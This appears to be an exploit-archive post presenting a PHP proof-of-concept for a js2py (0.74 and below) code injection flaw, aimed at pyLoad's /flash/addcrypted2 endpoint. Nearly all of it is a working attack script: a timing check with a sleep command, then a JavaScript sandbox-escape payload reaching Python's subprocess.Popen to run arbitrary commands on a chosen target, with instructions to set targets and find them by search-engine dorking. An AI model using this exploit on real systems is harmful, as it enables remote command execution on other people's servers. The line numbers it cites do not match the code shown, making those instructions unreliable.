=============================================================================================================================================
| # Title : js2py versions =============================================================================================================================================
| # Title : js2py versions 0.74 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 131.0.3 (64 bits) |
| # Vendor : https://pypi.org/project/Js2Py/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] vulnerability found in js2py versions 0.74 and below. js2py is a popular python package that can evaluate javascript code inside a python interpreter.

[+] save code as poc.php .

[+] Line 98 + 99 : set your target.

[+] USage : cmd => c:\www\test\php poc.php

[+] PayLoad :

<?php

// Include necessary libraries for HTTP requests and encoding
require 'vendor/autoload.php'; // Example for using HTTP libraries like Guzzle or similar

class PyloadRCEExploit
{
private $target;
private $rport;
private $targetUri;

public function __construct($target, $rport = 9666, $targetUri = '/')
{
$this->target = $target;
$this->rport = $rport;
$this->targetUri = $targetUri;
}

public function check()
{
$sleepTime = rand(5, 10);
$cmd = "sleep $sleepTime";

$startTime = microtime(true);
$this->executeCommand($cmd);
$elapsedTime = microtime(true) - $startTime;

echo "Elapsed time: $elapsedTime seconds\n";

if ($elapsedTime > $sleepTime) {
echo "Target is vulnerable! Command injection succeeded.\n";
return true;
}

echo "Target is not vulnerable.\n";
return false;
}

public function exploit($payload)
{
echo "Executing exploit on {$this->target}...\n";

if (!$this->check()) {
echo "Target is not vulnerable. Exploitation aborted.\n";
return;
}

$this->executeCommand($payload);
echo "Exploit executed. Check the target for results.\n";
}

private function javascriptPayload($cmd)
{
// Generate obfuscated JavaScript payload
$escapedCmd = addslashes($cmd);
return <<<EOD
let cmd = "$escapedCmd";
let base = '__base__';
let getAttribute = '__getattribute__';
let obj = Object.getOwnPropertyNames({})[getAttribute]("__class__")[base];
let subprocess = obj[getAttribute]('__subclasses__')().find(c => c.__module__ === 'subprocess' && c.__name__ === 'Popen');
subprocess(cmd, -1, null, -1, -1, -1, null, null, true).communicate();
EOD;
}

private function executeCommand($cmd)
{
$client = new GuzzleHttp\Client();
$cryptedB64 = base64_encode(random_bytes(4));
$javascriptPayload = $this->javascriptPayload($cmd);

try {
$response = $client->post("http://{$this->target}:{$this->rport}{$this->targetUri}flash/addcrypted2", [
'headers' => [
'Host' => "127.0.0.1:{$this->rport}"
],
'form_params' => [
'crypted' => $cryptedB64,
'jk' => $javascriptPayload
],
'timeout' => 10
]);

if ($response->getStatusCode() === 500) {
echo "Command executed successfully.\n";
return true;
}

} catch (Exception $e) {
echo "Error: {$e->getMessage()}\n";
}

return false;
}
}

// Example usage
$exploit = new PyloadRCEExploit('192.168.1.100');
$exploit->exploit('id'); // Replace 'id' with your desired payload


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================